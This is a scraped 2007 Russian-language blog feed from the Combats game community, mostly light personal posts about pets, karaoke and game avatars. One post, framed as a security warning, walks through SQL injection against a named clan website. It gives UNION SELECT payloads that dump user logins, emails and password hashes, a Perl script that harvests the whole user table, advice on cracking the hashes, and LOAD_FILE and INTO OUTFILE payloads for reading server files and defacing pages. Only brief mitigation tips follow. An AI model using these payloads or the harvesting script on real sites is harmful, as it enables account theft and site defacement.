login:        password:      
Combats Scrolls
Rambler's Top100
Гость БК
А йух его знает.) | Глаза Кето Open user info
Friend page
18.06.07 10:19   |  Лизка Open user info Open user photogallery |   Выходные...  ru
 Всего половину субботы и воскресенье не была в инете. Как итог - "Уведомления (всего 33| непрочитанных 33)"... Полдня теперь буду разбирать:)))


Mood: офигенное
Music: Ани Лорак "С первой улыбки"
Comments: 15 | Post comment
18.06.07 10:13   |  Лаки-Лаки Open user info Open user photogallery |   давайте думать вместе  ru
 дочь (та, которой 9 лет), последнее время ноет по поводу зверюшки. пааааааааап! ну купи мне зверюшку!!! аааааа!!! самое простое - игнор. но жалко ребенка. ума не приложу кого завести. попробую сформулировать тз:
1. кошку не хочу. в двух комнатах ковровое покрытие, а кошка точно хоть раз да насикает. как воняют ковры обсиканные кошкой - я знаю. потом дерет, зараза, все подряд. хотя кошек люблю и не готов в принципе к новой потому как сильно переживал по поводу смерти предыдущего кота.
2. собака. щенок тоже гадит где попало. а выгуливать кто будет? да и поскольку мелких собак я не воспринимаю, то встанет вопрос о каждодневной готовке этому теленку.
3. хомячок - нафиг. они гадат с такой же скоростью, как и жрут, а размножаются чуть медленнее чем гадят. да и вид у них. ну и продолжительность жизни маленькая.
4. рыбки. не знаю. хлопот с ними. температура, корм, чистка аквариума и т.д. да и они какие-то... т.е. больше для интерьера.

вооот. может что посоветуете?
Comments: 79 | Post comment
18.06.07 08:33   |  Фретка Open user info Open user photogallery |   Про БК, павлинов и понты..)  ru
 не выдержала.. и ночью.. вместо здорового сна написала статью..
Читаем и заряжаемся хорошим настроением на весь первый в неделе рабочий день.

Mood: боевое 
Music: Christina Aguilera - Hurt (Chris Cox Remix)
Post comment
18.06.07 00:40   |  Фретка Open user info Open user photogallery |   КТО СМОТРИТ ДОМ-2??  ru
 оказывается, на проекте появилось домашщнее животное? хорек? уже несколько дней как там живет?
кто-нить в курсе? я просто никогда подобное не смотрела и смотреть не буду.. хоть Ксюшу и уважаю..

Mood: разговорчивое 
Comments: 23 | Post comment
updated 16.12.09 19:34
17.06.07 14:57   |  Леся младшая Open user info Open user photogallery |   Рекомендую
 ru
 Наверное, в первый раз хочется похвалить статью в моем скролле. Прочитала я ее несколько минут назад, работа проделана действительно очень объемная и язык статьи - довольно живой.

Aldy [] рассказывает нам о нравах современных таможенников и проводит небольшой экскурс в историю этого подразделения. Собственно, статью можно было бы разделить на две условные части - в первой очень удачно описывается тенденция поведения зеленых и, в частности, те замашки на диктатуру в эме, что были так им присущи. Вторая часть - подробнейший разбор конкретного случая, когда один из таможенников открыто покрывает кач своей жены, а его коллеги кровавят тех, кто пытается дать ей отпор. После всех слов о нейтралитете этой структуры, статья производит действительно сильное впечатление.

Всем читать)
Comments: 11 | Post comment
17.06.07 04:09   |  MobileBlack Open user info Open user photogallery |   Справидивост. Чест. Нипадкупнастъ.  ru
 Занимательное чтиво о Таможне.
Рекомендую к прочтению :)
Comments: 7 | Post comment
16.06.07 13:50   |  Лизка Open user info Open user photogallery |   Приятного аппетита!  ru


Mood: ржачное
tags: юмор
Comments: 17 | Post comment
16.06.07 11:40   |  Лизка Open user info Open user photogallery |   Образы.  ru
 "УРРРРРРРРРРРРРРРАААААА!!!" - ору я! Наконец-то, нарисовали образ брюнетки, на который приятно смотреть. Напялила на себя:))
Вообще все три новых образа классные. Мне очень понравились. Художнику - "респект и уважуха":)) За образ брюнетки отдельное большое спасибо.

Mood: позитивное
tags: БК
Comments: 31 | Post comment
16.06.07 10:56   |  Лизка Open user info Open user photogallery |   О том, как я опозорилась.  ru
 Вчера, после очередного экзамена (на 4 сдалась), одногруппники потащили в Гидропарк (киевский, так сказать, центр развлечений), чтобы заценить кафешку, в которой будем отмечать окончание сессии. Выяснилось, что у них там можно петь под караоке. Лучше бы мне этого не говорили.
В общем, придумала, какую песню хочу спеть - у них её не оказалось... так, я перебрала штук 5 всяко-разных песен, но репертуарчик у них скудненький, поэтому пришлось петь хотя бы что-то, от чего меня не тошнит и что у них есть. Зря я так подумала. Выбрала, умная девочка, песню с очень высокими нотами и... опозорилась... наверное:)) Всё это дело записали на фотик. Потом послушаю, чё я там нафальшивила. И если не побоюсь позора и критики, выложу сюда.
Пела "Город 312 - Останусь".. Сбилась там посреди песни. Так переволновалась, что забыла о проигрыше:))
На публике пела первый раз в жизни. Пусть и не так хорошо, как хотелось бы, но всё-таки переступила через один из своих комплексов.

ЗЫ. Потом спела ещё одну песню, но там вообще не моя тональная категория была... даже вспоминать не хочу:)

Mood: сонное
Music: слушаю, как обычно, что-то по радио.
Comments: 8 | Post comment
16.06.07 03:55   |  чиппи-гламур Open user info |   защити себя сам  ru
 Для примера использован сайт клана Cossacks Of Hell

В связи с последними событиями в БК , я решил провести исследования клансайтов ..
К сожалению , как оказалось , большая часть подвержена серьезным уязвимостям..Я хочу рассказать вам и сберечь вас от наиболее распространенных..

Как оказалось 80% просмотренных мною клансайтов имеют схожие уязвимости - сиквэл инъекции , что далеко не странно , тк у программистов не хватает больше ума как использовать стандартные проверки в скриптах при обращении к реляционной базе данных..Зачем думать головой , если можно содрать уже написанное ? =))

Зачастую , о наличии сиквэл инъекции могут сказать ошибки , явно указывающие, что произошла ошибка в sql запросе. В тоже время о наличии ошибки в сиквэл запросе можно судить и по косвенным признакам ..

Чтобы реализовать наш с вами взлом давайте найдем параметр , значения которого передаются в запросе к БД.. Это достаточно просто , как правило это может быть параметр для обращения к новостной ленте , галлерии , списку статей , панели регестрации итд ..

структура такого запроса

http://site/test.php?id=номер статьи или новости

естественно , любой нормальный человек , увидев такое в строке запроса или в сорсе кода начнет сУвать туда всякую херь =)

http://site/test.php?id=9999

http://site/test.php?id=ааа

http://site/test.php?id=0

http://site/test.php?id=-0

http://site/test.php?id=-1000

итд

в 10 сайтах , уже на этом этапе я получил ошибку , связанную с неверным сиквэл запросом

Некоторые программисты наивно полагают , что их спасет заключение параметра в одиночные ковычки - ' и ошибочная фильтрация символов.. бугага =)

что-нить типо

<?php

$param=preg_replace("/[a-zA-Z0-9]i","",$param);

?php>
---------------------------------------------------------------------------

если исследуя скрипт выше мы еще не получили ошибки , продолжим =))

http://site/test.php?id=-1'+/*

таким нехитрым маневром мы закрываем первую кавычку и ставим незакрытый сиквэл комментарий , который превращает следующий в запросе код в бесполезную информацию.

вуаля =))



*
Следует отметить , что вы можете и не получать вывод ошибочного запроса , но если в результате ковыряния параметра вы получаете редирект на главную страницу , или еще лучше страницу с пустым запросом или 500 ошибкой шттп - вы на верном пути и правильно выбрали атакуемый параметр ..
*

Дальше можно было бы и не писать ничего , если бы я не сомневался в профессионализме прогеров ..

далее начинаем подбирать верный запрос к таблице , туд , методом перебора выясняется номер столбца с выводом. Нам понадобится знать, в каком по счету столбце происходит вывод на страницу

http://site/test.php?id=-1'+union+select+null/*

если и такой запрос выдаст ошибку синтаксиса или пустую страницу , значит в скрипте, возможно имеется проверка на не пустоту одного из параметров ...

тогда идем конём ..

http://site/test.php?id=-1'+union+select+1/*

еееееее




http://site/test.php?id=-1'+union+select+1,2,3 итд/*

http://site/test.php?id=-1'+union+select+null,null,null,null,null,null,null/*


или если фильтруется пробуем

http://site/test.php?id=-1'+union+select+1,2,3,4,5,6,7/*

вуаля =))



Теперь можно перебирать имена таблиц .. Правильные запросы будут соответствовать существующим именам таблиц .. Наверно , интересно будет проверить на существование таблиц users , passwords , regusers и тд и тп ..
Если выводиться только одна строка из запроса (например , вместо тела статьи) , то можно передвигаться по строкам путем limit ..

http://site/test.php?id=-1'+union+select+1,concat(username,char(58),user_email,char(58),user_password),3,4,5,6,7+from+phpbb_users+limit+1,1/*

вуаля =))



*отдельно стоит рассказать про сиквэл функцию char() .. в качестве аргумента она принимает десятичный код ASCII символа , это нужно в том случае , когда скриптом фильтруются нужные символы...

например char(47) вернет нам / , когда если бы мы отослали его напрямую этот символ бы отфильтровался ..
*

Итак - мы имеем пароли в мд5 , логины и почтовые ящики пользователей .. (n делить на два , потом n деленное на два разделить на два итд)

Методом мат. анализа определяем , что записей в phpbb_forum тут 489 .. Анализируем сорс ошибки..
и пишем несложный скрипт на перле

не люблю я пхп =))

#!/usr/bin/perl -w

use LWP;
use strict;

my $ua=LWP::UserAgent->new;
my $i;
my $res;

$path='путь к уязвимости=-1\'+union+select+1,concat(username,char(58),user_email,char(58),user_password),3,4,5,6,7+from+phpbb_users+limit';


for ($i=1;$i<=488;$i++) {
my $res=$ua->request(HTTP::Request->new(GET=>$path.'+'."$i".',1/*'));
if ($res->is_success) {
$res->content=~/<center>Запрещено просматривать статью '(.*):(.*):(.*)'/;
open (LOG,">>list") || die " cant open file";
print LOG $1.':'.$2.':'.$3."\n";
close LOG;

} else {
print $res->status_line;
}
}



В кратце - используем модуль лвл для последовательного гет запроса ко всем строкам таблицы , выделяем из сорса нужные тэги , а из них в свою очередь - логины , пароли и мэйлы ..


вуаля =))

в фале list , в одной корневой со скриптом через 2 мин у нас вся база данных сайта =))

кидаем пароли клана на подбор в любую утилиту для штурма мд5

и вуаля , через минуту у нас уже пасс от одного соклана ..
а еще через два дня , от половины





но какого же будет ваше удивление , когда в ответ на инъекцию

http://site/test.php?id=-1'+union+select+1,LOAD_FILE(''),3,4,5,6,7/*

вы получите





сайтик то , на винде стоит , а это увеличивает полет фантазии вдвое
нам на самом деле и не нужны пароли , их можно и не качать ..
Достаточно написать что - нить типа

http://site/test.php?id=-1'+union+select+1,LOAD_FILE('путь к любому файлу на диске C:\'),3,4,5,6,7/*

для просмотра любого скрипта

и

http://site/test.php?id=-1'+union+select+1,'',2,3,4,5,6,7+from+phpbb_forum+into+outfile+'C:\usr\local\site\www\index.php'/*

для дефейса .. те подмены главной страницы .. да и вообще стереть любой файл можно ..
или закачать свое ..

Похожие уязвимости я нашел почти на всех топ клан сайтах ..
Даркклан , рмиб и пачке других..

Попытаться исправить это можно путем

- для целых и дробных величин , перед их использованием в запросе надо привести величину к нужному типу ..

$id=(int)$id; $total=(float)$total;

Вместо этого можно вставить систему слежения за тестированием на сиквэл инъекцию ..

if((string)$id<>(string)(int)$id) {

// пишем в лог о попытке ..

die('ops');

}

- для строковых параметров , которые не используются в like , regexp и тд , экранируем кавычки ..

$str=addslashes($str);

или , лучше я всегда советовал

mysql_escape_string($str)

- в строках , которые предполагается использовать внутри like , regexp и тд , необходимо так же заэкранировать специальные символы , применяющиеся в этих операторах , если это необходимо.. В противном случае , можно задокументировать использование этих символов ..



На прощание хочу сказать - никогда не ждите благодарностей от людей..
удачи , и помните - если жизнь свернула вас как удав , терпите =)))

hacked by 4

hacked by RaD

отдельное спасибо Diogen-у
Comments: 19 | Post comment

Total posts: 4425 Pages: 443
«« « 1.. 10.. 20.. 30.. 40.. 50.. 60.. 70.. 80.. 90.. 100.. 110.. 120.. 130.. 140.. 150.. 160.. 170.. 180.. 190.. 200.. 210.. 220.. 230.. 240.. 250.. 260.. 270.. 280.. 290.. 300.. 310.. 320.. 330.. 340.. 350.. 360.. 370.. 380.. 389 390 391 392 393 394 395 396 397 398 399 400.. 410.. 420.. 430.. 440.. » »»
 
 


« 2025 june »
Mo Tu We Th Fr Sa Su
1
2 3 4 5 6 7 8
9 10 11 12 13 14 15
16 17 18 19 20 21 22
23 24 25 26 27 28 29
30

 
 © 2007–2025 «combats.com»
  18+  
feedback